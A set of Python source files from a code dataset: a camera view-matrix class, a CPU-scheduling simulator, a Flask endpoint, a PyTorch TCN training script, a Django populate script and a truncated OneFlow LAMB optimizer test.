M_{pers}^{-1}\n self.m_view_inv = None\n self.m_pers_inv = None\n # ready\n self.is_ready = False\n\n def set(self, c, p_ref, v_prime, h, d, f):\n # set\n if type(c) != list or len(c) != 3 \\\n or type(c[0]) != int or type(c[0]) != float \\\n or type(c[1]) != int or type(c[1]) != float \\\n or type(c[2]) != int or type(c[2]) != float:\n raise Exception('There is a type error in parameter `c`.')\n if type(p_ref) != list or len(p_ref) != 3 \\\n or type(p_ref[0]) != int or type(p_ref[0]) != float \\\n or type(p_ref[1]) != int or type(p_ref[1]) != float \\\n or type(p_ref[2]) != int or type(p_ref[2]) != float:\n raise Exception('There is a type error in parameter `p_ref`.')\n if type(v_prime) != list or len(v_prime) != 3 \\\n or type(v_prime[0]) != int or type(v_prime[0]) != float \\\n or type(v_prime[1]) != int or type(v_prime[1]) != float \\\n or type(v_prime[2]) != int or type(v_prime[2]) != float:\n raise Exception('There is a type error in parameter `v_prime`.')\n if type(h) != int and type(h) != float:\n raise Exception('Parameter `h` must be a number.')\n if type(d) != int and type(d) != float:\n raise Exception('Parameter `d` must be a number.')\n if type(f) != int and type(f) != float:\n raise Exception('Parameter `f` must be a number.')\n self.__c = np.array(c)\n self.__p_ref = np.array(p_ref)\n self.__v_prime = np.array(v_prime)\n self.__h = h\n self.__d = d\n self.__f = f\n self.__calculate()\n\n def set_by_file(self, file_path):\n # read file\n with open(os.path.split(os.path.realpath(__file__))[0] + os.sep + file_path) as file:\n line_list = file.readlines()\n for line in line_list:\n line_split = line.split()\n if len(line_split) <= 0:\n continue\n if line_split[0] == \"C\":\n self.__c = np.array([float(line_split[1]), float(line_split[2]), float(line_split[3])])\n elif line_split[0] == \"P_{ref}\":\n self.__p_ref = np.array([float(line_split[1]), float(line_split[2]), float(line_split[3])])\n elif line_split[0] == \"V\\'\":\n self.__v_prime = np.array([float(line_split[1]), float(line_split[2]), float(line_split[3])])\n elif line_split[0] == \"h\":\n self.__h = float(line_split[1])\n elif line_split[0] == \"d\":\n self.__d = float(line_split[1])\n elif line_split[0] == \"f\":\n self.__f = float(line_split[1])\n # calculate `m_view` and `m_pers`\n self.__calculate()\n\n def __calculate(self):\n # N, U, V\n temp = self.__p_ref - self.__c\n self.N = temp / np.linalg.norm(temp, 2)\n temp = np.cross(self.N, self.__v_prime)\n self.__u = temp / np.linalg.norm(temp, 2)\n self.__v = np.cross(self.__u, self.N)\n # R, T\n self.__r = np.eye(4)\n self.__r[0][:3] = self.__u\n self.__r[1][:3] = self.__v\n self.__r[2][:3] = self.N\n self.__t = np.eye(4)\n self.__t[0][3] = -self.__c[0]\n self.__t[1][3] = -self.__c[1]\n self.__t[2][3] = -self.__c[2]\n # M_{view}, # M_{pers}\n self.m_view = np.dot(self.__r, self.__t)\n self.m_pers = np.zeros((4, 4))\n self.m_pers[0][0] = self.__d / self.__h\n self.m_pers[1][1] = self.__d / self.__h\n self.m_pers[2][2] = self.__f / (self.__f - self.__d)\n self.m_pers[2][3] = -self.__d * self.m_pers[2][2]\n self.m_pers[3][2] = 1\n # M_{view}^{-1}, # M_{pers}^{-1}\n self.m_view_inv = np.linalg.inv(self.m_view)\n self.m_pers_inv = np.linalg.inv(self.m_pers)\n # ready\n self.is_ready = True\n","sub_path":"lab3/camera.py","file_name":"camera.py","file_ext":"py","file_size_in_byte":4507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"506447074","text":"'''\nAbdullah Zameek - Scheduling Lab (simulate FCFS, SJF, RR and HRPN)\n\n'''\nimport sys\n\n########\n#These are global flags that are going to be used over the course of the code. \nglobal VERBOSE, SHOW_RANDOM, OPEN, randomFile, RR, IOUtilisation\nIOUtilisation = 0\nRR = False\nVERBOSE = False\nSHOW_RANDOM = False\nOPEN = True\n#################### HELPER FUNCTIONS/CLASSES START HERE ###############################\n\ndef processInput():\n '''Returns a list of lists of all process blocks and the number of processes.'''\n with open(sys.argv[-1], 'r') as f:\n contents = f.read()\n contents = contents.split()\n contents = [int(i) for i in contents]\n numProcesses = contents.pop(0)\n return [contents[i:i + 4] for i in range(0, len(contents), 4)], numProcesses\n\ndef randomOS(U):\n '''Returns the value 1 + X mod U '''\n randomNo = int(randomFile.readline().strip())\n return 1 + randomNo % U\n\nclass Timer:\n def __init__(self):\n self.timer = 0\n\n def getTime(self):\n return self.timer\n \n def update(self):\n self.timer+=1\n\n################## END OF HELPER FUNCTIONS/CLASSES #####################################\n\nclass Process: \n def __init__(self,A,B,C,M,i):\n self.A = A\n self.B = B\n self.C = C\n self.M = M\n self.i = i\n self.state = \"unstarted\" # There are five possible states -> unstarted, ready, running, blocked, terminated\n self.readyTime = 0\n self.burst = 0\n self.previousBurst = 0 \n self.remainingTime = C\n self.finishTime = 0\n self.runningTime = 0\n self.blockedTime = 0\n self.waitingTime = 0\n self.turnaroundTime = 0\n\n ### JUST FOR RR ######\n self.quantum = 2\n ### JUST FOR RR ######\n\n\n def updateState(self):\n curTime = sysClock.getTime()\n if self.state == \"unstarted\":\n if curTime == self.A:\n self.setReady()\n\n if self.state == \"blocked\":\n if self.burst == 0:\n self.setReady()\n\n if self.state == \"running\":\n if self.remainingTime == 0:\n self.state = \"terminated\"\n self.finishTime = curTime\n self.burst = 0\n elif self.burst == 0:\n self.setBlocked()\n elif RR:\n if self.quantum == 0:\n self.setReady()\n return\n\n def getCPUBurst(self):\n self.previousBurst = randomOS(self.B)\n self.burst = self.previousBurst\n return\n\n def getIOBurst(self):\n self.burst = self.previousBurst * self.M\n return \n\n def setBlocked(self):\n self.getIOBurst()\n self.state = \"blocked\"\n return\n \n def setReady(self):\n curTime = sysClock.getTime()\n self.state = \"ready\"\n self.readyTime = curTime\n return\n\n def setRunning(self):\n self.state = \"running\"\n if RR:\n self.quantum = 2\n if self.burst == 0:\n self.getCPUBurst()\n return\n\n def getRatio(self):\n return self.turnaroundTime/max(1,self.runningTime)\n\n def updateTimes(self):\n if self.state not in [\"unstarted\", \"terminated\"]: #Nothing to do in these two cases \n self.turnaroundTime+=1\n if self.state == \"ready\":\n self.waitingTime+=1\n elif self.state == \"running\":\n self.runningTime += 1\n self.remainingTime -= 1\n if RR:\n self.quantum -=1\n if (self.burst):\n self.burst -=1\n elif self.state == \"blocked\":\n self.blockedTime +=1\n if self.burst > 0:\n self.burst -=1\n return \n\n def printProcessAttr(self):\n print(\"({} {} {} {}) \".format(self.A, self.B, self.C, self.M), end='')\n\n def printProcess(self):\n print(\"\\t(A, B, C, M) = ({}, {}, {}, {})\\n\\tFinishing Time: {}\\n\\tTurnaround Time: {}\\n\\tI/O Time: {}\\n\\tWaiting Time: {}\\n\\t\".format(self.A, self.B, self.C, self.M, self.finishTime, self.finishTime-self.A, self.blockedTime, self.waitingTime))\n\n\n######################## MANIPULATE THE PROCESSLIST #############################################\n\ndef orderByArrivalTime(processList):\n processList.sort(key=lambda process: process.A)\n return processList\n\ndef orderByInput(processList):\n processList.sort(key=lambda process: process.i)\n return processList\n\ndef orderByReadyState(processList):\n processList.sort(key=lambda process: process.readyTime)\n return processList\n\ndef orderByShortestJob(processList):\n processList.sort(key=lambda process: process.C - process.runningTime)\n return processList\n\ndef orderByHPRN(processList):\n processList.sort(key=lambda process: -process.getRatio())\n return processList \n\ndef checkComplete(processList):\n global finishTime\n for process in processList:\n if process.state != \"terminated\":\n return False\n finishTime = sysClock.getTime() - 1\n return True\n \ndef getProcessesByState(processList, state):\n newList = []\n for process in processList:\n if process.state == state:\n newList.append(process)\n return newList\n\ndef updateProcessTimers(processList):\n global IOUtilisation\n if getProcessesByState(processList, \"blocked\"):\n IOUtilisation += 1\n for process in processList:\n process.updateTimes()\n return \n\ndef updateProcessStates(processList):\n for process in processList:\n process.updateState()\n return\n\ndef printListSummary(processList):\n cpuUtil = sum(list([process.runningTime for process in processList])) / finishTime\n ioUtil = (IOUtilisation / finishTime)\n throughput = 100*len(processList) / finishTime\n turnaround = sum(list([process.turnaroundTime for process in processList])) / len(processList)\n waitingTime = sum(list([process.waitingTime for process in processList])) / len(processList)\n print(\"Summary Data :\\n\\tFinishing Time: {}\\n\\tCPU Utilisation: {:.6f}\\n\\tI/O Utilisation: {:.6f}\\n\\tThroughput: {:.6f} processes per hundred cycles\\n\\tAverage turnaround time: {:.6f}\\n\\tAverage Waiting Time: {:.6f}\".format(finishTime,cpuUtil,ioUtil, throughput, turnaround, waitingTime))\n\n\n####################### END OF PROCESS LIST MANIPULATION ##########################################\n\n\n########################## SCHEDULING ALGORITHM ##################################################\n\ndef schedulingAlgorithm(processList, schedulingMethod, RndR=False):\n global RR \n RR = RndR\n i = 0\n while not checkComplete(processList):\n if VERBOSE:\n verboseLine= \"\"\n print(\"Before Cycle {} \".format(str(i)),end='')\n for process in processList:\n verboseLine += process.state + \" : \" + str(process.burst) + \" \"\n print(verboseLine)\n i+=1\n updateProcessTimers(processList)\n updateProcessStates(processList)\n if not(getProcessesByState(processList, \"running\")):\n readyProcesses = orderByArrivalTime(orderByInput(getProcessesByState(processList,\"ready\")))\n if schedulingMethod == \"First Come First Served\":\n readyProcesses = orderByReadyState(readyProcesses) #this only works for first come first served \n if schedulingMethod == \"Round Robin\":\n readyProcesses = orderByReadyState(readyProcesses)\n if schedulingMethod == \"Shortest Job First\":\n readyProcesses = orderByShortestJob(readyProcesses)\n if schedulingMethod == \"Highest Penalty Ratio Next\":\n readyProcesses = orderByHPRN(readyProcesses)\n if readyProcesses:\n readyProcesses.pop(0).setRunning()\n sysClock.update()\n print()\n print(\"The scheduling algorithm used was \"+schedulingMethod)\n print()\n return processList\n\n########################## MAIN ##################################################\ndef main():\n global VERBOSE, SHOW_RANDOM\n global sysClock\n global finishTime \n global IOUtilisation\n global randomFile\n randomFile = open(\"random-numbers.txt\", 'r')\n IOUtilisation =0 \n finishTime = 0\n\n if \"--verbose\" in sys.argv:\n VERBOSE = True\n if \"--show-random\" in sys.argv:\n SHOW_RANDOM = True\n \n ################################# FIRST COME FIRST SERVED ################################\n\n #First, we take the input files and read the inputs into a list of lists and return it.\n processes, numProcesses = processInput()\n sysClock = Timer()\n processList = []\n #Then, we take this list of lists of processes and then create each list into a \"Process\"\n for i in range(len(processes)):\n processList.append(Process(*processes[i],i)) \n print(\"The original input was : \"+str(numProcesses)+\" \", end='')\n for process in processList:\n process.printProcessAttr()\n print()\n #Then, we take each of these processes and then append it to a process list.\n processList = orderByArrivalTime(processList)\n \n print(\"The sorted input was : \"+str(numProcesses)+\" \", end='')\n for process in processList:\n process.printProcessAttr()\n print(\"\\n\")\n processList = schedulingAlgorithm(processList, \"First Come First Served\")\n for i in range(len(processList)):\n print(\"Process {}:\\t\".format(str(i)))\n processList[i].printProcess()\n #Then we manipulate the process list until all the processes have a state of terminated and then we're done. \n printListSummary(processList)\n print(\"---------------------------------------------------------------------------------\")\n ########################### ROUND ROBIN #################################################\n IOUtilisation =0 \n finishTime = 0\n randomFile.seek(0)\n #First, we take the input files and read the inputs into a list of lists and return it.\n processes, numProcesses = processInput()\n sysClock = Timer()\n processList = []\n #Then, we take this list of lists of processes and then create each list into a \"Process\"\n for i in range(len(processes)):\n processList.append(Process(*processes[i],i)) \n print(\"The original input was : \"+str(numProcesses)+\" \", end='')\n for process in processList:\n process.printProcessAttr()\n print()\n #Then, we take each of these processes and then append it to a process list.\n processList = orderByArrivalTime(processList)\n \n print(\"The sorted input was : \"+str(numProcesses)+\" \", end='')\n for process in processList:\n process.printProcessAttr()\n print(\"\\n\")\n processList = schedulingAlgorithm(processList, \"Round Robin\", True)\n for i in range(len(processList)):\n print(\"Process {}:\\t\".format(str(i)))\n processList[i].printProcess()\n #Then we manipulate the process list until all the processes have a state of terminated and then we're done. \n printListSummary(processList)\n print(\"---------------------------------------------------------------------------------\")\n ########################### SHORTEST JOB FIRST #################################################\n IOUtilisation =0 \n finishTime = 0\n randomFile.seek(0)\n #First, we take the input files and read the inputs into a list of lists and return it.\n processes, numProcesses = processInput()\n sysClock = Timer()\n processList = []\n #Then, we take this list of lists of processes and then create each list into a \"Process\"\n for i in range(len(processes)):\n processList.append(Process(*processes[i],i)) \n print(\"The original input was : \"+str(numProcesses)+\" \", end='')\n for process in processList:\n process.printProcessAttr()\n print()\n #Then, we take each of these processes and then append it to a process list.\n processList = orderByArrivalTime(processList)\n \n print(\"The sorted input was : \"+str(numProcesses)+\" \", end='')\n for process in processList:\n process.printProcessAttr()\n print(\"\\n\")\n processList = schedulingAlgorithm(processList, \"Shortest Job First\")\n for i in range(len(processList)):\n print(\"Process {}:\\t\".format(str(i)))\n processList[i].printProcess()\n #Then we manipulate the process list until all the processes have a state of terminated and then we're done. \n printListSummary(processList)\n print(\"---------------------------------------------------------------------------------\")\n ########################### HIGHEST PENALTY RATIO NEXT #################################################\n IOUtilisation =0 \n finishTime = 0\n randomFile.seek(0)\n #First, we take the input files and read the inputs into a list of lists and return it.\n processes, numProcesses = processInput()\n sysClock = Timer()\n processList = []\n #Then, we take this list of lists of processes and then create each list into a \"Process\"\n for i in range(len(processes)):\n processList.append(Process(*processes[i],i)) \n print(\"The original input was : \"+str(numProcesses)+\" \", end='')\n for process in processList:\n process.printProcessAttr()\n print()\n #Then, we take each of these processes and then append it to a process list.\n processList = orderByArrivalTime(processList)\n \n print(\"The sorted input was : \"+str(numProcesses)+\" \", end='')\n for process in processList:\n process.printProcessAttr()\n print(\"\\n\")\n processList = schedulingAlgorithm(processList, \"Highest Penalty Ratio Next\")\n for i in range(len(processList)):\n print(\"Process {}:\\t\".format(str(i)))\n processList[i].printProcess()\n #Then we manipulate the process list until all the processes have a state of terminated and then we're done. \n printListSummary(processList)\n print(\"---------------------------------------------------------------------------------\")\n\n\n \nif __name__ == \"__main__\":\n main()","sub_path":"Lab2/scheduler.py","file_name":"scheduler.py","file_ext":"py","file_size_in_byte":13985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"283343219","text":"from flask import Response, request\nfrom database.sucursal import Sucursal\nfrom flask_restful import Resource\n\nclass SucursalApi(Resource):\n def get(self):\n agencies = Sucursal.objects().to_json()\n return Response(agencies, mimetype=\"application/json\", status=200)\n\n def post(self):\n body = request.get_json()\n agency = Sucursal(**body).save()\n id = agency.id\n return {'id': str(id)}, 200\n","sub_path":"resources/sucursal.py","file_name":"sucursal.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"277943545","text":"import torch\nfrom torch.autograd import Variable\nimport torch.optim as optim\nimport torch.nn.functional as F\nimport sys\nfrom dataset import MitbinDataset\nfrom model import TCN\nimport numpy as np\nimport argparse\nfrom collections import defaultdict\nfrom sklearn.metrics import roc_auc_score\nfrom sklearn.metrics import auc\nfrom sklearn.metrics import precision_recall_curve\nfrom sklearn.metrics import f1_score\nfrom sklearn.metrics import accuracy_score,precision_score,recall_score\nimport os\n\nparser = argparse.ArgumentParser(description='Sequence Modeling - MITBIN-TCN')\nparser.add_argument('--batch_size', type=int, default=32, metavar='N',\n help='batch size (default: 32)')\nparser.add_argument('--cuda', action='store_true',\n help='use CUDA (default: True)')\nparser.add_argument('--dropout', type=float, default=0.05,\n help='dropout applied to layers (default: 0.05)')\nparser.add_argument('--clip', type=float, default=-1,\n help='gradient clip, -1 means no clip (default: -1)')\nparser.add_argument('--epochs', type=int, default=10,\n help='upper epoch limit (default: 20)')\nparser.add_argument('--ksize', type=int, default=7,\n help='kernel size (default: 7)')\nparser.add_argument('--levels', type=int, default=8,\n help='# of levels (default: 8)')\nparser.add_argument('--log-interval', type=int, default=500, metavar='N',\n help='report interval (default: 10')\nparser.add_argument('--lr_T', type=float, default=1e-3,\n help='initial learning rate (default: 1e-3)')\nparser.add_argument('--lr_E', type=float, default=1e-3,\n help='initial learning rate (default: 1e-3)')\nparser.add_argument('--lr_G', type=float, default=1e-3,\n help='initial learning rate (default: 1e-3)')\nparser.add_argument('--lr_R', type=float, default=1e-3,\n help='initial learning rate (default: 1e-3)')\nparser.add_argument('--optim', type=str, default='Adam',\n help='optimizer to use (default: Adam)')\nparser.add_argument('--nhid', type=int, default=25,\n help='number of hidden units per layer (default: 25)')\nparser.add_argument('--seed', type=int, default=1111,\n help='random seed (default: 1111)')\nparser.add_argument('--fold', type=int, default=0,\n help='use which fold data (default: 0)')\nparser.add_argument('--num_threds', type=int, default=0,\n help='number of threads to fetch data (default: 0)')\nparser.add_argument('--alpha', type=float, default=1.0,\n help='weight to control loss (default: 1.0)')\nparser.add_argument('--beta', type=float, default=1.0,\n help='weight to control loss (default: 1.0)')\nparser.add_argument('--gamma', type=float, default=1.0,\n help='weight to control loss (default: 1.0)')\nparser.add_argument('--savedir', type=str, default='checkpoint0',\n help='weight to control loss (default: 1.0)')\nargs = parser.parse_args()\n\ntorch.manual_seed(args.seed)\nif torch.cuda.is_available():\n if not args.cuda:\n print(\"WARNING: You have a CUDA device, so you should probably run with --cuda\")\n\ndef mkdir(path):\n if not os.path.exists(path):\n os.makedirs(path)\nmkdir(args.savedir)\n\nbatch_size = args.batch_size\nbatch_size = 1\nn_classes = 2\ninput_channels_T = 3\ninput_channels_E = 1\ninput_channels_G = 1\n\n#seq_length = 500\nepochs = args.epochs\nsteps = 0\nnum_threds = args.num_threds\n\nalpha = args.alpha\nbeta = args.beta\ngamma = args.gamma\n\nprint(args)\ntrain_dataset = MitbinDataset(args, is_for_train=True)\ntrain_loader = torch.utils.data.DataLoader(\n train_dataset,\n batch_size=batch_size,\n shuffle=True,\n num_workers=num_threds,\n drop_last=False)\ntest_dataset = MitbinDataset(args, is_for_train=False)\ntest_loader = torch.utils.data.DataLoader(\n test_dataset,\n batch_size=batch_size,\n shuffle=False,\n num_workers=num_threds,\n drop_last=False)\n\t\t\nchannel_sizes = [args.nhid] * args.levels\nkernel_size = args.ksize\n\nmodel_T = TCN(input_channels_T, n_classes, channel_sizes, kernel_size=kernel_size, dropout=args.dropout)\nmodel_E = TCN(input_channels_E, n_classes, channel_sizes, kernel_size=kernel_size, dropout=args.dropout)\nmodel_G = TCN(input_channels_G, n_classes, channel_sizes, kernel_size=kernel_size, dropout=args.dropout)\n\nif args.cuda:\n model_T.cuda()\n model_E.cuda()\n model_G.cuda()\n \noptimizer = getattr(optim, args.optim)([{'params': model_T.parameters(), 'lr': args.lr_T},\n {'params': model_E.parameters(), 'lr': args.lr_E},\n {'params': model_G.parameters(), 'lr': args.lr_G}\n ])#,momentum=0.9)\n\ndef save_network(network, network_label, epoch_label):\n save_filename = 'net_epoch_%d_id_%s.pth' % (epoch_label, network_label)\n save_path = os.path.join(args.savedir, save_filename)\n torch.save(network.state_dict(), save_path)\n print ('saved net: %s' % save_path)\n \ndef train(ep):\n global steps\n total_loss = 0\n model_T_loss = 0\n model_E_loss = 0\n model_G_loss = 0\n \n model_T.train()\n model_E.train()\n model_G.train()\n \n correct = 0\n \n for batch_idx, (data, data_reverse, order_data, order_data_reverse, \\\n label, subject, feature) in enumerate(train_loader):\n \n data = torch.Tensor(data)\n data_reverse = torch.Tensor(data_reverse)\n order_data = torch.Tensor(order_data)\n order_data_reverse = torch.Tensor(order_data_reverse) \n feature = torch.Tensor(feature)\n target = torch.LongTensor(label)\n \n if args.cuda:\n data, data_reverse, order_data, order_data_reverse, feature, target = data.cuda(), data_reverse.cuda(), order_data.cuda(), order_data_reverse.cuda(), \\\n feature.cuda(), target.cuda()\n \n data = data.view(-1, input_channels_E, data.shape[0])\n data_reverse = data_reverse.view(-1, input_channels_E, data_reverse.shape[0])\n order_data = order_data.view(-1, input_channels_T, order_data.shape[1])\n order_data_reverse = order_data_reverse.view(-1, input_channels_T, order_data_reverse.shape[1])\n \n data, data_reverse, order_data, order_data_reverse, target, feature = Variable(data), Variable(data_reverse), \\\n Variable(order_data), Variable(order_data_reverse), \\\n Variable(target), Variable(feature)\n\n output_T = model_T.forward_T(order_data, order_data_reverse) \n output_E, _ = model_E.forward_E(data, data_reverse, feature)\n output_G, _, _ = model_G.forward_G(data, data_reverse, output_T.detach(), output_E.detach())\n\n #print (output_T.shape)\n #print (output_G.shape)\n #print (output_E.shape)\n\n optimizer.zero_grad()\n loss_T = F.nll_loss(output_T, target)\n loss_E = F.nll_loss(output_E, target)\n loss_G = F.nll_loss(output_G, target)\n\n loss = alpha * loss_T + beta * loss_E + gamma * loss_G\n \n loss.backward()\n optimizer.step()\n total_loss += float(loss)\n #model_T_loss += float(loss_T)\n #model_E_loss += float(loss_E)\n #model_G_loss += float(loss_G)\n\n pred = output_G.data.max(1, keepdim=True)[1]\n correct += pred.eq(target.data.view_as(pred)).cpu().sum()\n\n if batch_idx > 0 and batch_idx % args.log_interval == 0:\n print('Train Epoch: {} [{}/{} ({:.0f}%)]\\tTotal Loss: {:.6f}\\t ACC: {:.4f}'.format(\n ep, batch_idx * batch_size, len(train_dataset),\n 100. * batch_idx / len(train_dataset), total_loss/args.log_interval, float(correct) / (batch_idx*batch_size) ))\n total_loss = 0\n\ndef cal_performance(subject_dic, count_dic, real_dic):\n # vote results\n avg_acc = 0\n ind = 0\n real = []\n logits = []\n for key in subject_dic:\n subject_acc = subject_dic[key] / count_dic[key]\n print ('Subject %d: ACC is %f' %(key, subject_acc))\n ind += 1\n avg_acc += subject_acc\n real.append(real_dic[key])\n if subject_acc > 0.5:\n logit = real_dic[key]\n else:\n logit = 1 - real_dic[key]\n logits.append(logit)\n print ('Avg Subjects: ACC is %f' % (float(avg_acc) / ind))\n y_true = np.array(real)\n y_pred = np.array(logits)\n print ('Accuracy of Classifier:%f' % accuracy_score(y_true, y_pred))\n print ('ROC-AUC of Classifier:%f' % roc_auc_score(y_true, y_pred))\n precision, recall, _thresholds = precision_recall_curve(y_true, y_pred) \n print ('PR-AUC of Classifier:%f' % auc(recall, precision))\n print ('Macro-F1 of Classifier:%f' % f1_score(y_true, y_pred, average='micro'))\n print (\"precision:\", precision_score(y_true, y_pred))\n print (\"recall:\", recall_score(y_true, y_pred))\n \ndef test():\n model_T.eval()\n model_E.eval()\n model_G.eval()\n \n test_loss = 0\n \n correct_T = 0\n correct_E = 0\n correct_G = 0\n subject_dic_T = defaultdict(int)\n subject_dic_E = defaultdict(int)\n subject_dic_G = defaultdict(int)\n \n count_dic = defaultdict(int)\n\n real_dic = {}\n\n with torch.no_grad():\n for data, data_reverse, order_data, order_data_reverse, \\\n label, subject, feature in test_loader:\n data = torch.Tensor(data)\n data_reverse = torch.Tensor(data_reverse)\n order_data = torch.Tensor(order_data)\n order_data_reverse = torch.Tensor(order_data_reverse) \n feature = torch.Tensor(feature)\n target = torch.LongTensor(label)\n \n if args.cuda:\n data, data_reverse, order_data, order_data_reverse, feature, target = data.cuda(), data_reverse.cuda(), order_data.cuda(), order_data_reverse.cuda(), \\\n feature.cuda(), target.cuda()\n \n #seq_length = data.shape[1]\n #print (seq_length)\n data = data.view(-1, input_channels_E, data.shape[0])\n data_reverse = data_reverse.view(-1, input_channels_E, data_reverse.shape[0])\n order_data = order_data.view(-1, input_channels_T, order_data.shape[1])\n order_data_reverse = order_data_reverse.view(-1, input_channels_T, order_data_reverse.shape[1])\n \n data, data_reverse, order_data, order_data_reverse, target, feature = Variable(data), Variable(data_reverse), \\\n Variable(order_data), Variable(order_data_reverse), \\\n Variable(target), Variable(feature)\n\n output_T = model_T.forward_T(order_data, order_data_reverse) \n output_E, _ = model_E.forward_E(data, data_reverse, feature)\n output_G, _ , _= model_G.forward_G(data, data_reverse, output_T.detach(), output_E.detach())\n \n test_loss += F.nll_loss(output_G, target, size_average=False).item()\n\n pred_T = output_T.data.max(1, keepdim=True)[1]\n eq_T = pred_T.eq(target.data.view_as(pred_T)).cpu().sum()\n correct_T += eq_T\n\n pred_E = output_E.data.max(1, keepdim=True)[1]\n eq_E = pred_E.eq(target.data.view_as(pred_E)).cpu().sum()\n correct_E += eq_E\n \n pred_G = output_G.data.max(1, keepdim=True)[1]\n eq_G = pred_G.eq(target.data.view_as(pred_G)).cpu().sum()\n correct_G += eq_G\n\n subject_dic_T[subject.cpu().numpy()[0]] += eq_T.numpy()\n subject_dic_E[subject.cpu().numpy()[0]] += eq_E.numpy()\n subject_dic_G[subject.cpu().numpy()[0]] += eq_G.numpy()\n \n \n count_dic[subject.cpu().numpy()[0]] += 1.0\n real_dic[subject.cpu().numpy()[0]] = target.cpu().numpy()[0]\n\n test_loss /= len(test_dataset)\n print('\\nTest set: Average loss: {:.4f}, ACC_T: {:.4f} ACC_E: {:.4f} ACC_G: {:.4f}\\n'.format(\n test_loss, float(correct_T) / len(test_dataset), float(correct_E) / len(test_dataset), float(correct_G) / len(test_dataset)))\n\n print (\"-------------------------model_T--------------------------------\")\n cal_performance(subject_dic_T, count_dic, real_dic)\n print (\"-------------------------model_E--------------------------------\")\n cal_performance(subject_dic_E, count_dic, real_dic)\n print (\"-------------------------model_G--------------------------------\")\n cal_performance(subject_dic_G, count_dic, real_dic)\n \n return test_loss\n\n\nif __name__ == \"__main__\":\n for epoch in range(1, epochs+1):\n train(epoch)\n test()\n save_network(model_T, \"T\", epoch)\n save_network(model_E, \"E\", epoch)\n save_network(model_G, \"G\", epoch)\n","sub_path":"mitbin_test.py","file_name":"mitbin_test.py","file_ext":"py","file_size_in_byte":13312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"573649687","text":"import os\n\nos.environ.setdefault('DJANGO_SETTINGS_MODULE', 'tango_with_django.settings')\n\nimport django\ndjango.setup()\nfrom rango.models import Category, Page\n\ndef populate():\n\n python_pages = [\n {\"title\": \"Official Python Tutorial\", \"url\": \"http://docs.python.org\"},\n {\"title\": \"How to be a computer scientist\", \"url\": \"http://www.somebullshit.com\"},\n {\"title\": \"Learn Python in 10 mins\", \"url\": \"http://www.korokithakis.net\"}\n ]\n\n django_pages = [\n {\"title\": \"Official Django Tutorial\", \"url\": \"http://docs.djangoproject.com\"},\n {\"title\": \"Django Rocks\", \"url\": \"http://www.djangorocks.com\"},\n {\"title\": \"Tango with Djano\", \"url\": \"http://www.tangowithdjango.com\"}\n ]\n\n other_pages = [\n {\"title\": \"Volvic\", \"url\": \"http://www.volvic.com\"},\n {\"title\": \"Facebook\", \"url\": \"http://www.facebook.com\"}\n ]\n\n cats = {\"Python\": {\"pages\": python_pages,\"views\": 128, \"likes\": 64}, \"Django\": {\"pages\": django_pages, \"views\": 64, \"likes\":32}, \"Random\": {\"pages\": other_pages, \"views\":32,\"likes\":16}}\n\n for cat, cat_data in cats.items():\n c = add_cat(cat, cat_data[\"views\"],cat_data[\"likes\"])\n for p in cat_data[\"pages\"]:\n add_page(c, p[\"title\"], p[\"url\"])\n\n for c in Category.objects.all():\n for p in Page.objects.filter(category=c):\n print(\"- {0} - {1}\".format(str(c), str(p)))\n\ndef add_page(cat, title, url, views=0):\n\n p = Page.objects.get_or_create(category=cat, title=title)[0]\n p.url=url\n p.views=views\n p.save()\n return p\n\ndef add_cat(name, views, likes):\n c = Category.objects.get_or_create(name=name)[0]\n c.views=views\n c.likes=likes\n c.save()\n return c\n\n\nif __name__=='__main__':\n print (\"Starting populate scrupt\")\n populate()\n","sub_path":"populate_rango.py","file_name":"populate_rango.py","file_ext":"py","file_size_in_byte":1790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"637822495","text":"\"\"\"\nCopyright 2020 The OneFlow Authors. All rights reserved.\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\"\"\"\n\nimport os\nimport unittest\nfrom collections import OrderedDict\n\nimport numpy as np\nimport tensorflow as tf\nimport tensorflow_addons as tfa\nimport test_global_storage\nfrom test_util import GenArgList\n\nimport oneflow.compatible.single_client.unittest\nfrom oneflow.compatible import single_client as flow\n\ngpus = tf.config.experimental.list_physical_devices(\"GPU\")\nfor gpu in gpus:\n tf.config.experimental.set_memory_growth(gpu, True)\n\n\ndef compare_with_tensorflow_addons_lamb(\n test_case,\n device_type,\n x_shape,\n beta1,\n beta2,\n epsilon,\n weight_decay,\n learning_rate,\n train_iters,\n):\n assert device_type in [\"gpu\", \"cpu\"]\n flow.clear_default_session()\n func_config = flow.FunctionConfig()\n func_config.default_data_type(flow.float32)\n\n @flow.global_function(type=\"train\", function_config=flow.FunctionConfig())\n def testLAMB(\n random_mask: flow.typing.Numpy.Placeholder(x_shape, dtype=flow.float32)\n ) -> flow.typing.Numpy:\n with flow.scope.placement(device_type, \"0:0-0\"):\n x = flow.get_variable(\n name=\"x\",\n shape=x_shape,\n dtype=flow.float32,\n initializer=flow.random_uniform_initializer(minval=-10, maxval=10),\n trainable=True,\n )\n loss = flow.math.reduce_mean(x + random_mask)\n flow.optimizer.LAMB(\n flow.optimizer.PiecewiseConstantScheduler([], [learning_rate]),\n beta1=beta1,\n beta2=beta2,\n epsilon=epsilon,\n weight_decay=weight_decay,\n ).minimize(loss)\n return x\n\n random_masks_seq = []\n for i in range(train_iters + 1):\n random_masks_seq.append(np.random.uniform(size=x_shape).astype(np.float32))\n x_list = []\n init_value = None\n for i in range(train_iters + 1):\n x = testLAMB(random_masks_seq[i])\n x_list.append(x)\n if i == 0:\n init_value = np.copy(x)\n var = tf.Variable(init_value)\n opt = tfa.optimizers.LAMB(\n learning_rate=learning_rate,\n beta_1=beta1,\n beta_2=beta2,\n epsilon=epsilon,\n 